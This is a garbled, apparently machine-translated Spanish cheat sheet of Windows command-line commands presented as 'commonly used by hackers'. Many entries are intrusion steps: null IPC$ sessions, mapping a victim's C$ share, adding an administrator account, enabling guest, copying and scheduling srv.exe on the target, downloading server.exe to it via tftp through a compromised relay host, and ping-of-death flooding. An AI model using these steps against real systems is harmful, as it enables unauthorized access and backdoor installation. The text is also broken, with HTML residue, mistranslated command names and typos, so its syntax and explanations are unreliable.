Comandos de DOS comúnmente utilizados por los piratas informáticos
Comandos de DOS comúnmente utilizados por los hackers:
net use $">\\ip\ipc$Content$nbsp;" " /user:" " Establecer un enlace IPC vacío p>
net use $">\\ip\ipc$Contenido$nbsp;"Contraseña" /usuario:"Nombre de usuario" Crear un enlace IPC no vacío
net use h: $"> \\ip\ c$Contenido$nbsp;"Contraseña" /usuario:"Nombre de usuario" Después de iniciar sesión directamente, asigne la otra parte C: al H:
net use h: $">\ local. \ip\c$Content$ nbsp;Después de iniciar sesión, asigne la otra parte C: al H:
net use $">\\ip\ipc$Content$nbsp;/del Eliminar el Enlace IPC
uso de red h: /del elimina la asignación de la otra parte al H:
nombre de usuario y contraseña del usuario de red local/agregar crea un usuario
>usuario de red invitado /activo: sí activa el usuario invitado
usuario de red Ver qué usuarios
nombre de cuenta de usuario de red Ver propiedades de la cuenta
nombre de usuario de administradores de grupo local de red/ add Agregue "usuario" al administrador para que tenga derechos de administrador, nota: agregue s después del administrador y use la forma plural
net start Compruebe qué servicios están habilitados
nombre del servicio net start inicia el servicio (como: net start telnet, net start Schedule)
net stop nombre del servicio para detener un servicio
hora neta \\ ip objetivo verificar la hora de la otra parte
hora neta \\ ip de destino /set configura la computadora local. La hora se sincroniza con la hora del host "IP de destino" y el mensaje de confirmación se puede cancelar agregando el parámetro /yes
net view para ver qué *** recursos compartidos están habilitados en la LAN local
net view \ \ip Verifique qué recursos compartidos de VPN están habilitados en la LAN de la otra parte
net config muestra la configuración de red del sistema
cierre de sesión de red desconecta los recursos compartidos de VPN
nombre del servicio de pausa de red para pausar un servicio
net send ip "mensaje de texto" para enviar información a la otra parte
net ver tipo de conexión de red e información que se utiliza en la LAN
net share Ver el *** share abierto localmente
net share ipc $Content$nbsp;Habilitar ipc$*** share
net share ipc$Content$nbsp;/del Eliminar ipc$***share
net share c$Content$nbsp ;/del Eliminar C:***share
usuario de red invitado 12345 Inicie sesión con el usuario invitado y use la contraseña Cambiar a 12345
contraseña de red cambiar contraseña de inicio de sesión del sistema p>
netstat -a para comprobar qué puertos están abiertos, netstat -an de uso común
netstat -n para verificar el estado de la conexión de red del puerto, netstat -an de uso común
netstat -v para ver el trabajo en curso
netstat -p ejemplo de nombre de protocolo: netstat -p tcq/ip para ver el uso de un determinado protocolo (ver el uso del protocolo tcp/ip)
p>
netstat -s Ver el uso de todos los protocolos en uso
nbtstat -A ip Si uno de los puertos 136 a 139 de la otra parte está abierto, puede ver el nombre de usuario de la otra parte. inicio de sesión reciente (antes de 03 está el nombre de usuario) - Nota: el parámetro -A debe estar en mayúscula
tracert - Se utiliza el parámetro ip (o nombre de computadora) ruta de seguimiento (paquete), parámetro: "-w número" para establecer el intervalo de tiempo de espera.
Ping ip (o nombre de dominio) envía datos con un tamaño predeterminado de 32 bytes al otro host Parámetros: "-l [espacio] tamaño del paquete"; "-n número de veces para enviar datos" ; "-t "se refiere a hacer ping todo el tiempo.
ping -t -l 65550 ip ping of death (enviar archivos de más de 64K y hacer ping todo el tiempo se convierte en el ping de la muerte)
ipconfig (winipcfg) para Windows NT y XP (Windows 95 98) Para ver la dirección IP local, ipconfig puede usar el parámetro "/all" para mostrar toda la información de configuración
tlist -t muestra los procesos en una lista de líneas de árbol (es una herramienta adicional para el sistema y no se instala de forma predeterminada en la carpeta Soporte/herramientas del directorio de instalación)
kill -F Agregue el parámetro -F al nombre del proceso para forzar el final de un proceso (es un. herramienta adicional para el sistema, que no está instalada de forma predeterminada en el soporte del directorio de instalación /carpeta herramientas)
Agregue el parámetro -F al nombre del archivo del -F para eliminar el archivo de solo lectura. /AR, /AH, /AS y /AA representan la eliminación de archivos de solo lectura, ocultos y del sistema respectivamente, archivos de almacenamiento, /A-R, /A-H, /A-S, /A-A significan eliminar archivos que no sean de lectura. Sólo archivos ocultos, del sistema y de almacenamiento. Por ejemplo, "DEL/AR *.*" significa eliminar todos los archivos de solo lectura en el directorio actual, y "DEL/A-S *.*" significa eliminar todos los archivos en el directorio actual excepto los archivos del sistema
del /S /Q directorio o utilice: rmdir /s /Q directorio /S para eliminar el directorio y todos los subdirectorios y archivos bajo el directorio. Al mismo tiempo, use el parámetro /Q para cancelar la operación de eliminación y elimínela directamente después de que el sistema la confirme.
(Los dos comandos tienen el mismo efecto)
mover letra de unidad\ruta\nombre del archivo a mover, ruta donde se almacena el archivo movido\nombre de archivo después del movimiento, use el parámetro /y para cancelar la confirmación que existe el mismo archivo en el directorio movido. Sobrescriba directamente las indicaciones
fc one.txt two.txt > 3st.txt. Compare los dos archivos y envíe las diferencias al archivo 3st.txt. y "> >" son duplicados. El comando dirigido
en el número de identificación inicia una tarea programada registrada
en /delete detiene todas las tareas programadas. Utilice el parámetro /yes para detener directamente sin confirmación.
en el número de identificación/eliminar Detener una tarea programada registrada
en Ver todas las tareas programadas
en \\ip hora nombre del programa (o un comando) /r Ejecute un determinado programa en el otro lado en un momento determinado y reinicie la computadora
dedo nombre de usuario @host para ver qué usuarios han iniciado sesión recientemente
puerto IP Telnet remoto y servidor de inicio de sesión, el puerto predeterminado es 23
open ip se conecta a IP (un comando después de iniciar sesión en telnet)
telnet Escriba telnet directamente en la máquina local para ingresar al telnet local
copiar ruta\nombre de archivo 1 ruta\nombre de archivo 2 /y Copiar el archivo 1 al directorio especificado como archivo 2. Utilice el parámetro /y para cancelar la confirmación de que desea sobrescribir un archivo de directorio existente
copiar c:\srv.exe $ ">\\ip\admin$Contenido$nbsp;Copiar c:\srv.exe local al administrador de la otra parte
cppy 1st.jpg/b+2st.txt/ a 3st.jpg Cambie 2st. El contenido del txt está oculto en 1st.jpg para generar un nuevo archivo 3st.jpg Nota: El encabezado del archivo 2st.txt debe tener tres filas vacías. /a se refiere al archivo en formato ASCLL
copiar $\svv.exe">\\ip\admin$\svv.exe c:\ o:copiar\\ip\admin$\*.* Copiar el archivo srv.exe compartido por el admini$*** de la otra parte (todos los archivos) al C local:
xcopy La dirección de destino del archivo o árbol de directorios que se va a copiar\nombre del directorio para copiar el archivo y árbol de directorios, use el parámetro /Y para sobrescribir el mismo archivo sin preguntar
tftp -i propia IP (use la IP de la máquina de carne cuando use la máquina de carne como trampolín) get server.exe c:\ server.exe Después de iniciar sesión, descargue el server.exe de "IP" al host de destino c:\server.exe Parámetros: -i significa transmitir en modo binario, como cuando se transmiten archivos exe. Si no se agrega -i. , se transmitirá en modo ASCII (modo de transmisión de archivos de texto)
tftp -i La IP de la otra parte puso c:\server Después de iniciar sesión con el exe, cargue el c:\server.exe local en el host.
El puerto ftp ip se utiliza para cargar archivos al servidor o realizar operaciones con archivos. El puerto predeterminado es 21. bin se refiere a la transmisión en modo binario (entrada de archivo ejecutable); el valor predeterminado es la transmisión en formato ASCII (archivo de texto)
la impresión de ruta muestra la ruta IP, que mostrará principalmente la dirección de red, la dirección de red y la máscara de subred. Máscara de red., dirección de puerta de enlace Dirección de puerta de enlace, dirección de interfaz Interfaz
arp Ver y procesar el caché ARP ARP significa resolución de nombres y es responsable de analizar una IP en una dirección MAC física.
arp -a mostrará toda la información
nombre o comando del programa de inicio /max o /min para abrir una nueva ventana y maximizar (minimizar) ejecutar un programa o comando
mem Ver el uso de la CPU
nombre de archivo de atributo (nombre de directorio) Ver los atributos de un archivo (directorio)
nombre de archivo de atributo-A -R -S -H o +A +R + S +H elimina (agrega) los atributos de archivo, de solo lectura, de sistema y ocultos de un determinado archivo; use + para agregarlo como un determinado atributo
dir Ver archivos, parámetros: /Q muestra en qué sistema están los archivos; y los directorios pertenecen al Usuario, /T:C muestra la hora de creación del archivo, /T:A muestra la última vez que se accedió al archivo, /T:W hora de la última modificación
fecha /t, hora /t use este parámetro "FECHA/T", "HORA/T" solo mostrará la fecha y hora actuales sin tener que ingresar una nueva fecha y hora
establecer Especifique el nombre de la variable de entorno = el carácter que se va a utilizar. asignado a la variable Establecer la variable de entorno
p>set muestra todas las variables de entorno actuales
set p (u otros caracteres) muestra todas las variables de entorno actuales que comienzan con el carácter p (u otros caracteres )
pause Pausa el programa por lotes y muestra: Presione cualquier tecla para continuar....
si realiza procesamiento condicional en el programa por lotes (consulte if comando y variables para obtener más instrucciones )
La etiqueta Goto dirige cmd.exe a la línea etiquetada en el programa por lotes (la etiqueta debe ser una línea separada y precedida por dos puntos, por ejemplo: etiqueta ":start")
ruta de llamada\nombre del archivo por lotes Llama a otro programa por lotes desde dentro de un programa por lotes (consulte llamar a /? para obtener más instrucciones)
para Ejecutar un comando específico en cada archivo de un conjunto de archivos (consulte la para comando y variable)
eco activado o desactivado activa o desactiva el eco. El uso de eco solo sin parámetros mostrará la configuración actual del eco
la información del eco se mostrará en la pantalla
p>
información de eco>> pass.txt Guarde "información" en el archivo pass.txt
findstr "Hello" aa.txt Busque la cadena hello en el archivo aa.txt
buscar nombre de archivo para buscar un archivo
el nombre del título del título cambia el nombre del título de la ventana CMD
el valor del color del color establece el color de primer plano y de fondo de la consola cmd 0=negro; , 1=azul, 2=verde, 3=verde claro, 4=rojo, 5=morado, 6=amarillo, 7=blanco, 8=gris, 9=azul claro, A=verde claro, B=verde claro, C =rojo claro, D= violeta claro, E=amarillo claro, F=blanco brillante
el nombre del mensaje cambia el símbolo del sistema mostrado por cmd.exe (cambie C:\, D:\ a: EntSky\)
Imprimir nombre de archivo imprime un archivo de texto
ver muestra información de la versión en la ventana de DOS
winver abre una ventana para mostrar información de la versión (tamaño de memoria, sistema versión, versión del parche, nombre de la computadora)
formatear letra de unidad /FS: tipo formatear disco, tipo: FAT, FAT32, NTFS, ejemplo: Formato D: /FS:NTFS
md nombre del directorio crear directorio
reemplazar El directorio donde se reemplazará el archivo fuente.
ren El nombre del archivo original y el nuevo nombre del archivo.
árbol muestra el directorio en una estructura de árbol Uso El parámetro -f enumerará los nombres de los archivos en la carpeta
escriba el nombre del archivo muestra el contenido del archivo de texto
.más nombres de archivos muestran el archivo de salida pantalla por pantalla
comando doskey para bloquear = carácter
comando doskey para desbloquear = proporcionado para DOS
Bloquear comando (editar línea de comando, volver a invocar el comando win2k y crear macro). Por ejemplo: comando lock dir: doskey dir=entsky (doskey dir=dir no se puede usar desbloquear:
doskey dir= taskmgr Llame al administrador de tareas chkdsk /F D: verifique el disco D y muestre el estado); informe; agregue el parámetro /f y corrija el error en el disco tlntadmn telnt service admn, escriba tlntadmn seleccione 3, luego seleccione 8, puede cambiar el puerto predeterminado 23 del servicio telnet a cualquier otro puerto de salida del programa cmd.exe o actualmente, use el parámetro /B es Salir del script por lotes actual en lugar de cmd.exe ruta ruta\nombre de archivo ejecutable Establece una ruta al archivo ejecutable. cmd inicia una ventana de interpretación de comandos de win2K. Parámetros: /eff, /en cierra y habilita la expansión del comando; para obtener instrucciones más detalladas, consulte cmd /? regedit /s importa el nombre del archivo de registro al registro; el parámetro /S se refiere a la importación en modo silencioso sin ningún mensaje; archivo de registro El parámetro de nombre de archivo cacls del registro de exportación muestra o modifica la lista de control de acceso a archivos (ACL), cuando se utiliza el formato NTFS. Parámetros: /D nombre de usuario: configurado para denegar el acceso a un determinado usuario; /P nombre de usuario: permanente reemplaza los derechos de acceso del usuario especificado; /G nombre de usuario: permanente otorga derechos de acceso al usuario especificado. Puede ser: N ninguno, R; lee, W escribe, C cambia (escribe), F controla completamente, por ejemplo: cacls D:\test.txt /D pub establece d:\test.txt para denegar el acceso al usuario pub. nombre de archivo cacls Ver la lista de permisos de acceso del usuario del archivo Contenido de texto REM Agregar anotaciones al archivo por lotes netsh Ver o cambiar la configuración de la red local Comando del servicio IIS: iisreset /reboot Reinicie la computadora win2k (pero aparecerá un mensaje que indica que el sistema se reiniciará aparece) iisreset / start o stop Iniciar (detener) todos los servicios de Internet iisreset /restart Detener y luego reiniciar todos los servicios de Internet iisreset /status Mostrar el estado de todos los servicios de Internet iisreset /enable o enable Habilitar (deshabilitar) el reinicio de los servicios de Internet en el sistema local iisreset /rebootonerror Cuándo Al iniciar, detener o reiniciar el servicio de Internet, si ocurre un error, se reiniciará iisreset /noforce Si el servicio de Internet no se puede detener, el servicio de Internet no se finalizará por la fuerza. no detendrá el servicio de Internet cuando se alcance el período de tiempo de espera (segundos); si se especifica el parámetro /rebootonerror, la computadora se reiniciará. El valor predeterminado es 20 segundos para reiniciar, 60 segundos para detener y 0 segundos para reiniciar. Comando FTP: (los detalles se describirán más adelante) El formato de línea de comando de ftp es: ftp -v -d -i -n -g[nombre de host] -v muestra toda la información de respuesta del servidor remoto. -d Utiliza el modo de depuración. -n restringe el inicio de sesión automático de ftp, es decir, no utiliza el archivo .netrc. -g Cancelar nombres de archivos globales.
ayuda [comando] o ? [Comando] Vea la descripción del comando bye o salga para finalizar el proceso FTP del host y salir del modo de administración de FTP pwd enumera el directorio del host remoto actual poner o enviar el nombre del archivo local [el nombre del archivo cargado en el host] transferir un archivo local. al host remoto Obtener o recibir en el host final [nombre del archivo del host remoto] [nombre del archivo después de descargarlo al local] Transferir del host remoto al host local mget [archivos-remotos] Recibir un lote de archivos del host remoto al host local mput local -files Transfiera un lote de archivos en el host local al directorio del host remoto o ls [directorio-remoto] [archivo-local] Enumere los archivos en el directorio del host remoto actual. Si hay archivos locales, escriba el. resultados al archivo local ascii Configurar para transferir archivos en modo ASCII (valor predeterminado) bin o imagen Configurar para transferir archivos en modo binario bell Cada vez que se completa una transferencia de archivos, aparece una alarma cdup Regresar al directorio de nivel superior cerrar Interrumpir el ftp sesión con el servidor remoto (correspondiente a abrir) abrir host [puerto] Establecer una conexión de servidor ftp específica, puede especificar el puerto de conexión eliminar eliminar archivos en el host remoto mdelete [archivos remotos] eliminar un lote de archivos